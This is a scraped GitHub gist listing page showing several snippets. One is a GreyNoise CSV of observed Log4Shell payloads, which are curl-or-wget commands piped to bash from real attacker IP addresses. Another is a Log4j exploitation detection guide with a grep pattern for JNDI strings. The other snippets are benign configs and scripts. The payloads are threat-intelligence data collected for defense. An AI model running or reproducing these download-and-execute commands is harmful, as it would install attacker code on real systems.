Skip to content

Instantly share code, notes, and snippets.

View r0mdau's full-sized avatar

Romain Dauby r0mdau

View GitHub Profile
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active September 11, 2024 21:41
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@jpkrohling
jpkrohling / loadbalancer.otel.yaml
Created July 21, 2021 14:06
Load balancer config for otelcol
receivers:
otlp/loadbalancer:
protocols:
grpc:
endpoint: localhost:4317
otlp/backend-1:
protocols:
grpc:
endpoint: localhost:55690
otlp/backend-2:
@FZambia
FZambia / main.go
Last active August 15, 2023 04:36
Experimenting with QUIC and WebTransport in Go, see original post: https://centrifugal.github.io/centrifugo/blog/quic_web_transport/
package main
import (
"context"
"crypto/tls"
"encoding/binary"
"errors"
"io"
"log"
"net/url"
@mancubus77
mancubus77 / gist:447281619be3731461b73dd4a18593c5
Last active July 31, 2023 08:40
Prometheus node exporter init.d (Centos6/RHEL6)
#!/bin/bash
#
# /etc/rc.d/init.d/node_exporter
#
# Prometheus node exporter
#
# description: Prometheus node exporter
# processname: node_exporter
# Source function library.
@thomasdarimont
thomasdarimont / readme.md
Last active October 30, 2024 03:31
Example for decoding a JWT Payload with your Shell (bash, zsh...)

Setup

Add this to your .profile, .bashrc, .zshrc...

decode_base64_url() {
  local len=$((${#1} % 4))
  local result="$1"
  if [ $len -eq 2 ]; then result="$1"'=='
  elif [ $len -eq 3 ]; then result="$1"'=' 
  fi
 echo "$result" | tr '_-' '/+' | openssl enc -d -base64
@r0mdau
r0mdau / Kibana-readonly.md
Last active July 29, 2020 06:54
Kibana readonly over internet

Kibana Readonly

With this tip, kibana can't be modified. So you can share the uri to anyone on the internet. It's a network method to protect kibana from changes of anonymous.

Quick start

  1. You need to have a working kibana exposed over http on internet
  2. On the same elasticsearch server, install nginx : apt-get install nginx
  3. In the directory /etc/nginx/sites-available, create a new file and edit it, for example : vi /etc/nginx/sites-available/kibana-readonly
  4. Write the following configuration :
@brenopolanski
brenopolanski / merge-pdf-ghostscript.md
Last active September 28, 2024 22:54
Merge multiple PDFs using Ghostscript

A simple Ghostscript command to merge two PDFs in a single file is shown below:

gs -dNOPAUSE -sDEVICE=pdfwrite -sOUTPUTFILE=combine.pdf -dBATCH 1.pdf 2.pdf

Install Ghostscript:

Type the command sudo apt-get install ghostscript to download and install the ghostscript package and all of the packages it depends on.

@plentz
plentz / nginx.conf
Last active November 16, 2024 14:10
Best nginx configuration for improved security(and performance)
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048